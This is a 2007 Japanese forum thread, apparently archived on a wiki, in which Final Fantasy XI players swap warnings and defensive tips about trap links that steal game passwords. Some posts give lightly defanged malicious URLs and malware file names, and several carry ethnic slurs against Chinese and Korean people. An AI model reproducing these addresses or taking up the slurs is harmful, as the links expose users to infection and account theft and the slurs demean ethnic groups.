※上記の広告は60日以上更新のないWIKIに表示されています。更新することで広告が下部へ移動します。

中国人がFF系ブログに罠サイト張ってパス抜いてる
1 :既にその名前は使われています:2007/10/15(月) 00:36:12.79 ID:a6pLhWfC
なんとかしろ


2 :既にその名前は使われています:2007/10/15(月) 00:37:35.58 ID:VzYiAEpq
お前がなんとかしろ


3 :既にその名前は使われています:2007/10/15(月) 00:37:38.79 ID:jHuhyh+g
被害にあったときどうすれば良いのかテンプレが欲しいです


4 :既にその名前は使われています:2007/10/15(月) 00:39:04.64 ID:w+U2N7f6
中華以下のお前らの知能をまずなんとかしろ





無理か。


5 :既にその名前は使われています:2007/10/15(月) 00:40:05.62 ID:p6xQU04z
お前ら何とかしろ


6 :既にその名前は使われています:2007/10/15(月) 00:41:19.39 ID:ZrPgvY3R
ついに立ったか
いよいよ中華も終わりだな


7 :既にその名前は使われています:2007/10/15(月) 00:41:20.59 ID:/xcUjR/u
俺はいまひげ抜いてる


8 :既にその名前は使われています:2007/10/15(月) 00:42:28.11 ID:4IqcF0At
>>1
doko?


9 :既にその名前は使われています:2007/10/15(月) 00:44:48.93 ID:Bc+bkhyB
なんで公式に数か月も前からでてる情報で
いまさらわざわざスレたてるんだよ( ̄^ ̄)


10 :既にその名前は使われています:2007/10/15(月) 00:45:19.42 ID:AjYAnzkR
獣使い
モンク



11 :既にその名前は使われています:2007/10/15(月) 00:46:22.90 ID:/xcUjR/u
LSメンバー募集中
PCでサイト観覧できる人のみ

こんなLSが一番怪しい


12 :既にその名前は使われています:2007/10/15(月) 00:48:07.24 ID:v9xONA43 BE:578730555-2BP(110)
■グルだろもはや


13 :既にその名前は使われています:2007/10/15(月) 00:50:21.08 ID:PZkFosJZ
泣き寝入りでしょ。
フレが何人か被害あったけど、そのまま引退。
業者はアイテム抜いた後、エクレアは全部捨て。更にご丁寧なことにキャラ上書きまでして復活サービス受けられなくするからな。

ちなみにバハ鯖な。


14 :既にその名前は使われています:2007/10/15(月) 00:52:27.21 ID:T7cNe9Gq
業者はそんなめんどいことしないぞ
時間との勝負だから売りさばいておしまいだ


15 :既にその名前は使われています:2007/10/15(月) 00:54:12.25 ID:TRJ4HJMz
つまりそれは怨恨の線もあるとな


16 :既にその名前は使われています:2007/10/15(月) 00:56:04.51 ID:jHuhyh+g
・PS2やXBOX360で遊ぶ
・FFをプレイするPCでネットサーフィンしない、IDやパスをPC内に残さない
・もしするのであれば最新のウィルス駆除ソフト、スパイウェア駆除ソフトを入れてログインの前に必ずそれらを走らせる
・ウィンドウズアップデートを自動更新にし、常に最新の状態を保つ
・2ch等の掲示板や個人Blogにはられたリンクを気軽に踏まない
・万が一パス抜きをされた場合は運営に報告、サイバーネット課や生活安全課に相談

・・・・・・オワタ('A`)補足があれば頼む


17 :既にその名前は使われています:2007/10/15(月) 00:57:13.04 ID:TRJ4HJMz
>16
「リンクシェルコミュニティを利用しない」も。


18 :既にその名前は使われています:2007/10/15(月) 01:01:54.10 ID:jHuhyh+g
>>17
LSCは自動ログイン設定にしていなければ抜かれることは無いのでは?
公式のを使うなっていうのも乱暴だが確かにリスクはあるんだよね、あれ


19 :既にその名前は使われています:2007/10/15(月) 01:03:28.48 ID:TRJ4HJMz
キーロガーとかあったらだめじゃない?
FFXIですらPOLIDを使わない本人認証をしてるのに
■eって意識それより低いよな・・・


20 :既にその名前は使われています:2007/10/15(月) 01:03:43.02 ID:TRJ4HJMz
すまんFFXIAHな


21 :既にその名前は使われています:2007/10/15(月) 01:05:13.45 ID:jHuhyh+g
>>19
ああ、確かに。



22 :既にその名前は使われています:2007/10/15(月) 01:05:34.60 ID:ZJ2bSwg+

PlayOnlineにIDとパスなんか保存してんな!
最初は面倒かもしれんが一週間もすりゃ完璧覚えてる
もう家が燃えても大丈夫!


23 :既にその名前は使われています:2007/10/15(月) 01:10:42.84 ID:PZkFosJZ
>>14
や、被害逢った複数のフレが全員同じパターンだ。
バハの業者が手が混んでるだけかもしれないがな。

■に連絡しても、アイテムすっからかんの倉庫とエクレアが消えたメイン。もしくは、レベル1キャラに置き換えられたメインしか戻してくれない。
遡ってとか履歴とか辿ってくれっていっても無駄だったそうな。

はじめの被害者が3年前。一番最近でこの夏。でも■の対応は話聞く限り全く変わってないよ。


24 :既にその名前は使われています:2007/10/15(月) 01:15:02.06 ID:m4lmidMG
FFやらなければ解決


25 :既にその名前は使われています:2007/10/15(月) 01:15:09.18 ID:DPnk2hN8
リアルだけでなく、ゲームの中でも
ドロボーしてんのか..支那豚


26 :既にその名前は使われています:2007/10/15(月) 01:15:20.19 ID:s3ed5PEE
つうか、罠サイトでパス抜くのって普通に犯罪じゃね?


27 :既にその名前は使われています:2007/10/15(月) 01:17:08.05 ID:bCnymYVX
>>22
数行上の話を理解出来ていないオマエは何をやっても抜かれるだろうよwww


28 :既にその名前は使われています:2007/10/15(月) 01:18:18.58 ID:jHuhyh+g
・PS2やXBOX360で遊ぶ
・FFをプレイするPCでネットサーフィンしない
・IDやパスをPC内に残さない(キーの入力情報まで読まれることがあります)
・もしするのであれば最新のウィルス駆除ソフト、スパイウェア駆除ソフトを入れてログインの前に必ずそれらを走らせる
 (無料のツールならSpybot、Ad-aware、avast! Antivirus等があります)
・ウィンドウズアップデートを自動更新にし、常に最新の状態を保つ
・2ch等の掲示板や個人Blogにはられたリンクを気軽に踏まない
・万が一パス抜きをされた場合は運営に報告、サイバーネット課や生活安全課に相談

こんなとこかな。
あとはパス抜きURLを見つけた時の対処法だ。
誰か頼む('A`)


29 :既にその名前は使われています:2007/10/15(月) 01:19:55.95 ID:AjYAnzkR
>>26
日本国内ならな


30 :既にその名前は使われています:2007/10/15(月) 01:21:41.43 ID:Veyvl1tD
プログタイトル晒せ


31 :既にその名前は使われています:2007/10/15(月) 01:24:02.60 ID:Ky7QMhyq
捕捉
怪しげなアドレスを見つけたら
携帯→PC変換サイトで携帯側からのぞく大抵表示できない(データのみなので)真っ白な画面がでる
そうしたら踏まないこと


32 :既にその名前は使われています:2007/10/15(月) 01:24:49.58 ID:ZrPgvY3R
>>30
自動巡回ツール使ったスパムだよ
他人のブログタイトル偽装した罠サイトが多い


33 :既にその名前は使われています:2007/10/15(月) 01:25:39.83 ID:Ky7QMhyq
追加補足
真っ白な画面以外に標示できない画像になってることもあるらしい


34 :既にその名前は使われています:2007/10/15(月) 01:25:42.91 ID:V85+ACUG
PC版FF11はツーラーとニート廃人にしか売れてないし、さっさと切れよ
アルタナはPS2と箱360だけで発売しろ
PC版なんて全然売れてないだろ、健全に遊んでるプレイヤーに迷惑なんだよ


35 :既にその名前は使われています:2007/10/15(月) 01:25:50.69 ID:ZAd7yvLI
24時間常にログインしてる俺様は平気だな


36 :既にその名前は使われています:2007/10/15(月) 01:28:36.90 ID:MzoKX/Zt
>>35
後からログイン優先だぞ


37 :既にその名前は使われています:2007/10/15(月) 01:41:16.99 ID:2RjVccsB
公式で窓化出来るようになってからがヤバス


38 :既にその名前は使われています:2007/10/15(月) 02:28:07.24 ID:DPnk2hN8
PS2とXboxでやってる人で
被害に合った人はいないの?



39 :既にその名前は使われています:2007/10/15(月) 02:57:02.73 ID:CSfFN5qL
たかがゲーム機でどうやってパスを抜くのか説明してみろ


40 :既にその名前は使われています:2007/10/15(月) 02:59:11.62 ID:oaTC2JAi
今のキーロガーってコピペした内容もわかっちゃう?


41 :既にその名前は使われています:2007/10/15(月) 03:05:31.40 ID:Cd4AQy+k
>>38
■eがパスワードは8桁以上を推奨しているから
PS2、Xboxでも桁数は多い方が良いんじゃない?


42 :既にその名前は使われています:2007/10/15(月) 03:10:13.95 ID:GbtVnJow
某チョンゲだけど、ジョブwikiとかのリンク先が変えられてたりもしたわw
マジで気をつけろよ


43 :既にその名前は使われています:2007/10/15(月) 03:15:24.26 ID:DPnk2hN8
PS3でもネットできるみたいだけど
罠サイト踏んだらパス抜かれたりしない?
PSでネットとか少数だと思うけどw



44 :既にその名前は使われています:2007/10/15(月) 03:15:26.60 ID:82eWdTgD
うん?
知識ないからよくわかんねえんだけど
ブログにはっつけてあるサイトが罠なのか
それともブログそのものが罠なのか
不特定多数が編集できるサイトで
踏むと罠サイトに飛ばされるように
改ざんされてるリンクがあるのか

わけわかんねー


45 :既にその名前は使われています:2007/10/15(月) 03:30:27.50 ID:CSfFN5qL
ドリキャスでネットしてろKASU


46 :age:2007/10/15(月) 03:56:41.78 ID:S4zrR1gv
10-11付けで大量にはられてますね。
注意してください。

ちょっと調べてみたところ、リネ、ROでは既に蔓延しまくってるようで・・・
FFにもついにきたかーという感じでしょうか。
FF公式の日本語文をコピペした文章なのでうっかり踏んでしまう方もおられるかもしれません。



47 :age:2007/10/15(月) 03:58:38.16 ID:S4zrR1gv
ソースファイル、url等でぐぐってみたところ
こんな感じの文章がヒットしたのでコピペします。
以下コピペ
-------------
を踏むと
tp://www■blogplaync■com/king.htm
ここに飛ばされて、ここに仕込んである
chengzhi.exeを踏ませると。
ついでにブラクラみたいに小窓を複数開けて
垢ハックをブラクラと誤認させてる周到さ。
chengzhi.exeに付いてはググって頂戴ね。

king.cur:Win32/TrojanDownloader.Ani.Gen トロイ の亜種
------------------------
カスペ、NOD32等でも検出可能(?)っぽいです。
踏んでしまったらオンラインでスキャンが無難かも(?)
誰か詳しい人フォローして・・・


48 :既にその名前は使われています:2007/10/15(月) 04:00:14.52 ID:AjYAnzkR
>>44
コメント欄
トラックバック


49 :既にその名前は使われています:2007/10/15(月) 04:00:30.50 ID:xi7xrukT
ブログのコメント機能をOFFにしてる俺は勝ち組
どうせ過疎ブログだしもともと誰もコメント書き込まないからね^^v





;;


50 :既にその名前は使われています:2007/10/15(月) 04:05:08.25 ID:PYM+fsfx
PS3でネットしてる奴なんているの?
使い勝手どうなんだろ


51 :age:2007/10/15(月) 04:05:41.19 ID:S4zrR1gv
上記罠サイトコピペ、こんな人は注意したほうがいいらしいです。
■VBscriptが動いちゃう(?) → IE利用者?
■Win32.IMG-ANI.ac → winupdateサボってる人?

ありきたりですが一応・・・

FFでの罠サイト爆撃、今まであまりなかったような気がするので、
誰か対策等まとめて下さるとありがたいです。(他力本願)

それではおやすみなさい。


52 :既にその名前は使われています:2007/10/15(月) 04:06:07.59 ID:HnIOHfEY
>>44
ブログに罠コメントが書かれてる
wikiの外部リンクが罠サイトに改ざんされてる

下手こいたらブログのパスとかも抜かれて罠ブログになってるのもあるんかもね、そこまでやるかは知らんけど。

類似スレ
Wikiが業者に荒らされたら報告・修正するスレ
http://live25.2ch.net/test/read.cgi/ogame/1191823980/ [log]
↑のみたいなのを普通に踏んじゃうと罠に行く可能性があるわけよ


53 :既にその名前は使われています:2007/10/15(月) 07:53:30.23 ID:82eWdTgD
なるほどねー
外部リンクに注意か


54 :既にその名前は使われています:2007/10/15(月) 09:07:21.24 ID:mdtLoYw5
日記サイトなんて行かない&ウインなんて使ってない ので問題なし。
世界でもっとも危険なosをわざわざ使う意味が分からない。


55 :既にその名前は使われています:2007/10/15(月) 09:12:04.42 ID:W/MTsceV
流石に箱とPS2は被害無いよね?
今までPCだったが怖くて箱に移行した。


56 :既にその名前は使われています:2007/10/15(月) 09:13:18.78 ID:A6mCAcAM
スキャンでも発見されないとは困るな


57 :既にその名前は使われています:2007/10/15(月) 09:56:30.01 ID:CHaMhoOs
はいはい、罠コメントブログにかかれた挙句、久しぶりのコメントに小躍りして踏んだアホが通りますよ
拡張子は.jpg
慌ててコメント消して回線引っこ抜いたから詳細は分からなくなってしまった・・・
「両手武器は劇的に変わった」
というようなタイトルで、URLを踏むとノートン先生がアクセス拒否を受けていました

こっちはログインパスワードを別PCで変えたりしたけれど、不安だ・・・


58 :既にその名前は使われています:2007/10/15(月) 09:58:37.53 ID:oB/PsuGS
>「両手武器は劇的に変わった」というようなタイトルで
ワロタwwwww


59 :既にその名前は使われています:2007/10/15(月) 10:02:09.21 ID:CHaMhoOs
>>58
両手武器の記事にコメントされていたから笑い事でなく踏んだ人が結構いそうでこわい・・・


60 :既にその名前は使われています:2007/10/15(月) 10:03:47.96 ID:w+U2N7f6
お前らみたいな馬鹿が、リアルで騙される前にゲームで学習できてよかったじゃないか


61 :既にその名前は使われています:2007/10/15(月) 10:14:08.16 ID:rkSOYpl1
>>28
パス抜きする為にはさ、2通りあってなんらかの入力をさせるかjavaなりcgiなりのスクリプトを実行させるか
なんだよね。つまりプレーンなブラウザでwebsite表示させただけじゃクラックなんか
されたりしないんだよ。
もちろんそれなりにセキュリティホールは塞いである前提だけど。
だからまず、インターネットエクスプローラは使わない。
ワンクリで制限解除出来るスレイプニルとかおすすめ。
これで、デフォルトはJava禁止、クッキー禁止、禁止禁止のガッチガチモードに
しておいて、信頼性の高いサイトだけ許可したらいい。
例えば情報サイトでエレメンって有名なトコ、ここ別にjava入れてなくても閲覧
出来るんだよね。
他にもウィンダスとゆかいな仲間たちさんとかもそう。yahooメールだって
古いブラウザとかでもいいようにjavaオフなら古いcgiで動いてたはず、クッキーは
許可しないとダメだけど。そんな訳で

・ブラウザは2ch専ブラ(JaneStyle非IEコンポネ)とタブブラウザ(プニル・フォックス)強く推奨

これ入れて。2chからリンク踏む場合でもJaneStyleなら「ちょっと見ビュワー」機能で
プレーンテキストに抜いてくれる、スクリプトも非実行で文字列としてね。
これなら罠あっても踏まずに済むよ。


62 :既にその名前は使われています:2007/10/15(月) 10:15:25.62 ID:IEvb8sXc
PS2でやればいいじゃん。


63 :既にその名前は使われています:2007/10/15(月) 10:25:50.30 ID:/xcUjR/u
パスがおーっと抜かれた!
さすがみさき君鮮やかなさばきです
ここでみさき君から翼君へロングパスっ!



64 :既にその名前は使われています:2007/10/15(月) 10:43:58.92 ID:ZuWMRxXy
>>61
Sleipnir等のタブブラウザでもエンジンによってはIEの脆弱性を引き継ぐ
Sleipnirのデフォルトは、TridentエンジンなのでIEを使っているようなもんだから注意。
(JavaScriptをJavaと呼んではダメ。言葉は似ているけどまったく違うもの)


65 :既にその名前は使われています:2007/10/15(月) 11:09:57.18 ID:B99C62d9
いまだに
「FF用PCなのでセキュリティソフトとか入れていない^^;」
なんてのが普通に居るくらいだしな・・・。


66 :既にその名前は使われています:2007/10/15(月) 11:21:32.02 ID:33g4XDn0
FFログアウトしなきゃ解決じゃね?


67 :既にその名前は使われています:2007/10/15(月) 11:25:32.78 ID:Gs87ckor
ログインされたら回線おちるよ


68 :既にその名前は使われています:2007/10/15(月) 11:26:59.04 ID:MdVBTL7j
取り敢えず、>>9から>>65に繋いでおく。
本当、ウイルス対策ソフト入れない馬鹿いまだにいるからな。


ここから入れない馬鹿の言い訳(理由)集


69 :既にその名前は使われています:2007/10/15(月) 11:29:25.88 ID:9M7ILir5
対処のテンプレに加えてくれ
・中国を核の炎で焼き尽くす


70 :既にその名前は使われています:2007/10/15(月) 11:32:43.31 ID:Da9yzkEr
セキュリティソフトは入れてるけどスパイウェア対策ソフトは入れてないな
海外製品ばっかで使いづらいってのもあるけど


71 :既にその名前は使われています:2007/10/15(月) 11:34:25.72 ID:/xcUjR/u
対策ソフト入れてても変なサイト足踏み入れりゃ何かしらやられるんだがw


72 :既にその名前は使われています:2007/10/15(月) 11:34:41.58 ID:VgJ3pwSd
ミャンマーと同じでネット封鎖でいいよもう


73 :既にその名前は使われています:2007/10/15(月) 11:35:10.68 ID:XqzSacs8
>>70
SpyBotだかは日本語で操作できるのぜ


74 :既にその名前は使われています:2007/10/15(月) 11:38:38.89 ID:YEH11Y8A
①ウィルスチェックで落とされるのでウィルスバスター切る。
②いちいちウィルスバスター切るのが面倒になってくる
③どうせ切るなら最初から入ってなくていいや


現在に至る


75 :既にその名前は使われています:2007/10/15(月) 11:44:04.76 ID:2/MINvwD
うわ…俺週末に踏んだかもしれない。
最近FF再開して、FFって楽しいなぁと再確認した矢先なのに。


76 :既にその名前は使われています:2007/10/15(月) 11:47:09.14 ID:c8PrA3jy
別ゲームでも紹介されていたが
有名なブログと外見が全く同じブログを作ってそこが罠サイトって場合もあるらしい


77 :既にその名前は使われています:2007/10/15(月) 11:49:20.28 ID:CKpc9g6J
>>spybot1.5版は日本語版でインスコしても英語のままになってる部分がいっぱいあるよ
不完全なのかバグなのか知らんけど
免疫化と免疫解除も不完全になっちまうバグ?もあるみたいだし
別の意味でインスコするの危険だ


78 :既にその名前は使われています:2007/10/15(月) 11:49:41.67 ID:uteCZYJK
中国は最悪だなよ
過去自分たちが植民地化されて嫌な思いをしたのに
ミャンマーの軍事政権を後押ししてるんだぜ
どういうことだよ


79 :既にその名前は使われています:2007/10/15(月) 11:52:35.68 ID:s19sNYwT
つーか、FFってパスの情報ベタで持ってんの?w
暗号化もされてないの?
それとも暗号化されてるけど容易に解析されたとか?
抜かれる奴にも責任はあるがバ開発もダメ杉だろ。


80 :既にその名前は使われています:2007/10/15(月) 11:57:29.30 ID:B99C62d9
どうしても金掛けたくねぇって人で、OSがXP/Vistaなら、
ファイアウォール:デフォの(送信は遮断しないらしいので使えないが)
ウィルス対策:Avast!/AVG
スパイ対策:Windows Defender/Ad-Aware(英語)/Spy bot

J-Wordインスコされる安いソフト買うくらいなら、フリーでもいいかもしれん。


81 :既にその名前は使われています:2007/10/15(月) 11:59:42.98 ID:XGJWRhQI
ツールにスパイウェア PCには弊害多すぎる
いかにゲーム機だけのオンラインゲームが安全かわかったな
■よ、次に活かせよ。


82 :既にその名前は使われています:2007/10/15(月) 12:00:28.08 ID:uWYBlKZL
セキュリティ対策で金掛けたくねぇ!って言ってる人には、一度パス抜かれて涙目になってもらったほうがいいんじゃない?
えふえふいれぶん^^;のパスだけならまだしも、将来間違いなくクレカ抜かれるって


83 :既にその名前は使われています:2007/10/15(月) 12:03:13.31 ID:dmNrdvvo
spybot、ウイルス情報が英語なのは勘弁してくれw


84 :既にその名前は使われています:2007/10/15(月) 12:03:21.47 ID:dFX+vFsm
J-WORDはスパイウェアそのものだろ…jk…


85 :既にその名前は使われています:2007/10/15(月) 12:03:49.16 ID:qY7JMJ4h
ん?

POL関係のバージョンアップでパス抜き対策は行われたんじゃないの?
それともバージョンアップでの対応は実は嘘 or 手抜きだったとか?

前はメモリにそのまま入っていたのが、今度は半角スペースで1文字ずつあけて入っているとか?ww


86 :既にその名前は使われています:2007/10/15(月) 12:08:12.39 ID:/xcUjR/u
たとえば罠が仕組まれててもそれ以降パス打つ機会がなければ盗まれないケースもある
ちょくちょくパス変更などで打ってる時に盗まれる場合もあるということだ



87 :既にその名前は使われています:2007/10/15(月) 12:22:37.17 ID:h+I/Zy+I
wikiのリンクいじられてる?
警告でて回線抜いたけどPCネット用の旧式マック使ってたから
被害無さそうだけど。
詳しいひと調査お願いします。


88 :既にその名前は使われています:2007/10/15(月) 12:26:40.77 ID:33g4XDn0
ジョブ別のwikiはもうだめだな


89 :既にその名前は使われています:2007/10/15(月) 12:33:45.24 ID:84dU4gbX
>>17
>「リンクシェルコミュニティを利用しない」も。

リンクシェルコミュニティからパス抜かれる危険ってあるの?



90 :既にその名前は使われています:2007/10/15(月) 12:34:57.16 ID:CHaMhoOs
即回線引っこ抜いて、別PCでパス変えたけれどやっぱり不安だ・・・


91 :既にその名前は使われています:2007/10/15(月) 12:35:59.07 ID:WkeW9cl2
avastっていうフリーのウィルス検知ソフト使ってるんだけどわりといい感じ。
日本語対応してるしね。


92 :既にその名前は使われています:2007/10/15(月) 12:38:32.77 ID:sBZdmUXd
>>89
PassをWebで入力するのが危険っていいたいんだろ。
オンラインスキャンならここもあるっぽ
http://www.kaspersky.co.jp/virusscanner


93 :既にその名前は使われています:2007/10/15(月) 12:40:26.28 ID:84dU4gbX
ああなるほど


94 :既にその名前は使われています:2007/10/15(月) 12:40:32.71 ID:bz8tbAi9
おいおい昨日これ踏んじまったぞ・・・
一応ウイルスバスター2007で引っかかったから削除したけど、どーすりゃいいんだ?


95 :既にその名前は使われています:2007/10/15(月) 12:46:07.64 ID:2/MINvwD
週末に踏んだサイトを携帯でもう一回覗きにいったんだが、↓に飛ばされてた。
tp://www.xiaoriben.net/FFXI/index.htm
なんかおもいっきり中華のサイトなんだがヤバいですか?


96 :既にその名前は使われています:2007/10/15(月) 12:47:33.70 ID:dmNrdvvo
>>95
※このアドレスは危険URLのひとつです。


スキャンお勧め


97 :既にその名前は使われています:2007/10/15(月) 12:49:09.29 ID:8tc1ZXLJ
>>95
つーかそんな露骨にピンインなサイト踏むなww
あと貼るなら頭以外のどっか削れww踏むバカが出て二次被害出るぞww


98 :既にその名前は使われています:2007/10/15(月) 12:51:11.04 ID:I2mbGDHk
>>95
アドレスのxiaoribenって中国語で小日本って意味だなw
笑えるwww


99 :既にその名前は使われています:2007/10/15(月) 12:51:45.29 ID:W/MTsceV
アドレス見ただけで危険だろw
あと>>97の言うとおりもう少し削りなさいw



100 :既にその名前は使われています:2007/10/15(月) 12:53:11.00 ID:pIp+nk4t
Microsoft? Windows? 悪意のあるソフトウェアの削除ツール 最新版
http://www.microsoft.com/downloads/thankyou.aspx?familyId=ad724ae0-e72d-4f54-9ab3-75b8eb148356&displayLang=ja


101 :既にその名前は使われています:2007/10/15(月) 12:56:07.50 ID:2/MINvwD
すいません、焦ってしまいまして。
ちなみにmixiの自分の日記にコメントがあり、URLを短縮できるサイトで別の物に変えられていたのですが、不用意に踏んだのがいけなかった…。



102 :既にその名前は使われています:2007/10/15(月) 12:57:41.57 ID:sBZdmUXd
>>95
フレームでjavascript仕込んでるね
パス抜きとループの2重罠?
危険すぎw


103 :既にその名前は使われています:2007/10/15(月) 12:59:12.01 ID:OpMKEtp1
よく考えたら、スパイウェアでタイピングハックとかされて垢盗まれる可能性もあるんだから
リンクシェルコミュニティに登録とか、ログインするときにスパイウェアあったら完璧にアウトだな。

リンクシェルコミュニティは■eからの罠だなw
パス変える前に裏LSの都合で一度登録したけど、もう二度とログインしねーわw


104 :既にその名前は使われています:2007/10/15(月) 12:59:37.53 ID:8tc1ZXLJ
>>101
とりあえず速攻で駆除して別PCorPS2or箱でFF起動→パス変更
くらいはやっておく方がいいだろうな。
俺も一度mixiで踏んだわ。FFに使ってない方のPCだったけど一応パス変更と駆除はしておいた。


105 :既にその名前は使われています:2007/10/15(月) 13:00:09.08 ID:fWWms7Ms
中華サイトは、シナ系ゲームの公式でさえあんま踏みたくないな


106 :既にその名前は使われています:2007/10/15(月) 13:05:00.10 ID:2/MINvwD
>>104
仕事から帰ったらそうします。アドバイスありがとう。
てか初心者でもあるまいし危機感もつべきだ俺…



107 :既にその名前は使われています:2007/10/15(月) 13:08:18.05 ID:OpMKEtp1
>>106
もう手遅れかもよ?
中華が垢ハックするのに日本人のゴールデンタイムにするわけがないし。
やるとしたら大抵の人が仕事の昼間or寝てる夜中でしょ。

あと>>95をマジでどうにか汁二次被害でるぞ、ネ実は削除依頼あるのかしらんが・・・


108 :既にその名前は使われています:2007/10/15(月) 13:09:36.76 ID:7j7ByKTs
被害者と見せかけて、実は中華の工作員なんだろ('A`)


109 :既にその名前は使われています:2007/10/15(月) 13:10:58.40 ID:sWqjwt+8
またか、俺は毎回パス入力してログインしてるけど。


110 :既にその名前は使われています:2007/10/15(月) 13:12:10.95 ID:YcNLJ2Gn
毎回パス手打ちの方が危なくね?
キー入力そのまま送信なんて罠の方が多そうだが、
つうかPOLのパスワードの保存って暗号化されてるんじゃないの?
その暗号化すら破られている?


111 :既にその名前は使われています:2007/10/15(月) 13:12:53.72 ID:8tc1ZXLJ
>>106
107の言うとおりマジで手遅れかもしれんよ?
もし外回りの仕事だったらネカフェでも行ってパス変更だけでもしてきなさい。
せいぜい10分や20分でできるからちょっと腹の調子が・・・でもごまかせるかもな。
フレでもパスぶっこ抜き金目の物全パクリされたのがいるけど真面目に悲惨だわ。


112 :既にその名前は使われています:2007/10/15(月) 13:14:46.99 ID:/xcUjR/u
>>109みたいに慎重な奴は普段から怪しいサイトさえも踏んでないから安全でいられるだけであって
怪しいサイト踏んでる奴でそれと同じことしたら危ない


113 :既にその名前は使われています:2007/10/15(月) 13:16:01.70 ID:YcNLJ2Gn
>>九十五って、Windowsアップデート最新でアンチウィルスソフト入れててもヤバイ?

つうか、一応不用意にマーカーも打たないようにしとく


114 :既にその名前は使われています:2007/10/15(月) 13:16:15.74 ID:dmNrdvvo
何処かに保存されてるPOLのID、PASSを抜き取るのか、
それとも手打ちのPOLのID、PASSを送信するのか、
どっちなんだろう

誰か教えてくれ


115 :既にその名前は使われています:2007/10/15(月) 13:18:00.80 ID:/xcUjR/u
抜かれないようにしたいならゲーム回線と普通回線別々に引けばいい



116 :既にその名前は使われています:2007/10/15(月) 13:18:06.31 ID:8tc1ZXLJ
FFのログインは暗号化されてない丸裸ってどっかで見た気がする。
つまり■e超矢吹超ノーガード戦法で最強ってこった。


117 :既にその名前は使われています:2007/10/15(月) 13:19:31.36 ID:YcNLJ2Gn
>>114
POLのパスの暗号が既に破られているなら両方、
破られていないなら手打ちじゃね?

俺も暗号が破られているかどうかが凄く気になる
そこまで業者の行動を把握してる奴なんていないかもしれないが・・・


118 :既にその名前は使われています:2007/10/15(月) 13:20:30.82 ID:OpMKEtp1
>>110
どうなのかね?
タイピングハックされてたら毎回パス入力してたとしてもアウト、■eが警告促してるんだから
パスが暗号化されててもそれを解析しちまうんだろう。

一番有効な手段は、ネットサーフィンするPCでFFはやらない。
リンクシェルコミュニティは使わない、パスワードをPCに保存しない。
こんなところか?
スパイウェア駆除ソフトといっても、発見されない新種もあるだろうし
完璧に信用はできねーなぁ。
ここまで心配しなくても怪しいサイトさえ踏まなきゃいいんだろうけどねw


119 :既にその名前は使われています:2007/10/15(月) 13:21:17.20 ID:ifePfyVT
>>1-2
この流れにワロタ



120 :既にその名前は使われています:2007/10/15(月) 13:21:30.99 ID:ysmY2GSW
パスは復号できなくても暗号のままでログインできるから笑える


121 :既にその名前は使われています:2007/10/15(月) 13:21:33.65 ID:YcNLJ2Gn
>>116
平文か!!!


122 :既にその名前は使われています:2007/10/15(月) 13:21:33.78 ID:fWWms7Ms
keyloggerは後者だろうな、WoWでもかなり問題になってる


123 :既にその名前は使われています:2007/10/15(月) 13:25:20.19 ID:YcNLJ2Gn
まあ、罠にかかっても問題ないなんていう環境を作り出すのではなく
罠にかからない環境を作る方が確実って事だな


124 :既にその名前は使われています:2007/10/15(月) 13:26:46.38 ID:ysmY2GSW
     _ _ __
     〈>´  ` くノ
     | i iノノ人)〉
     |ilリ、゚ _ ゚ノ| よん?
    /|メ」ヽy/メ」.|
    (  |_ // ノヽ_
    \ ̄|つ=|\  |つ
    ∠\|ムゝ\ \|
   ノノ/ / \ \
   ( ( /__/   >__)
   ∪/爻   /爻
    l_\  l_\




125 :既にその名前は使われています:2007/10/15(月) 13:28:09.25 ID:sWqjwt+8
>>112
確かにFFXIの関連サイトなんてwikiかエレメンくらいしかみてないわ


126 :既にその名前は使われています:2007/10/15(月) 13:28:09.15 ID:sBZdmUXd
>>113
踏んでみた。
アクティブXのアドインのDLさせようとしてくるね
ノートンは危険の警告だしてきたが他はわからん



127 :既にその名前は使われています:2007/10/15(月) 13:31:19.91 ID:dmNrdvvo
>>125
問題はFFのwikiに怪しいページが張られまくってることだなw


128 :既にその名前は使われています:2007/10/15(月) 13:32:50.96 ID:mdOCeo7Z
>>111
ネカフェのPCが一番危ない


129 :既にその名前は使われています:2007/10/15(月) 13:33:57.85 ID:sWqjwt+8
でも普段よくネットするやつなんて、そこが怪しいのか怪しくないのか判断できるよな


130 :既にその名前は使われています:2007/10/15(月) 13:34:24.96 ID:YcNLJ2Gn
他のスレで質問した事だけどやっぱりこっちで質問した方が
良かった気がしてきたから、こっちでも質問させてくれ

ウィルスバスターにパスワードやクレジットカードの番号流出防衛機能ってついていたけど
アレで防衛できるものなのかな・・・

たしか、登録したサイト以外に指定した文字列の送信を出来なくするような機能だったはず
指定する時FFの鯖ってplayonline.comでいいのか・・・


131 :既にその名前は使われています:2007/10/15(月) 13:37:39.14 ID:fWWms7Ms
avast使ってる人のプロバイダ起動数知りたい
webと標準シールド以外で重要なのあるのかね


132 :既にその名前は使われています:2007/10/15(月) 13:38:11.11 ID:9HyDXFD2
こっちのスレも見ておくといい

Wikiが業者に荒らされたら報告・修正するスレ
http://live25.2ch.net/test/read.cgi/ogame/1191823980/ [log]


133 :既にその名前は使われています:2007/10/15(月) 13:43:47.88 ID:8tc1ZXLJ
>>128
キーロガー仕込まれてるってこと?
ネカフェでパス変更→帰宅後再度パス変更でネカフェ部隊がパス回収されても問題ない気がするが。
つかネカフェのPCって毎回初期化って言ってるけどセキュリティどうなってるんだろうな。


134 :既にその名前は使われています:2007/10/15(月) 13:49:29.75 ID:MzoKX/Zt
>>130
普通のWebブラウザでフィッシングサイトに行ったときに、本物の
サイトを間違えて大事な情報を送らないようにする機能だから、
マルウェアからの防衛には期待しないほうがいい。


135 :既にその名前は使われています:2007/10/15(月) 13:50:06.15 ID:HhxXO+0d
最終ラインのノートン先生が何とかしてくれる・・・はず


136 :既にその名前は使われています:2007/10/15(月) 13:51:20.02 ID:ysmY2GSW
アンチウィルスでは防げないよ


137 :既にその名前は使われています:2007/10/15(月) 13:52:22.16 ID:dmNrdvvo
最終ラインがノートン先生は正直微妙だな


138 :既にその名前は使われています:2007/10/15(月) 14:01:28.76 ID:02T/wVMm
ノートン先生のライン統率能力とスピードではシナ業者のスルーパスには
対応できませんな・・・


139 :既にその名前は使われています:2007/10/15(月) 14:05:25.36 ID:2FZ8LNjW
>>39
パケット監視のハードはいくらでもある


140 :既にその名前は使われています:2007/10/15(月) 14:30:46.92 ID:2/MINvwD
>>106です。とりあえず定時までどうにもならないので、手遅れを覚悟して仕事します。
九十五の件も迂濶でした。申し訳ない。
とりあえずどうなったか後で結果報告に来ます。


141 :既にその名前は使われています:2007/10/15(月) 14:32:41.19 ID:5jeF8Si1
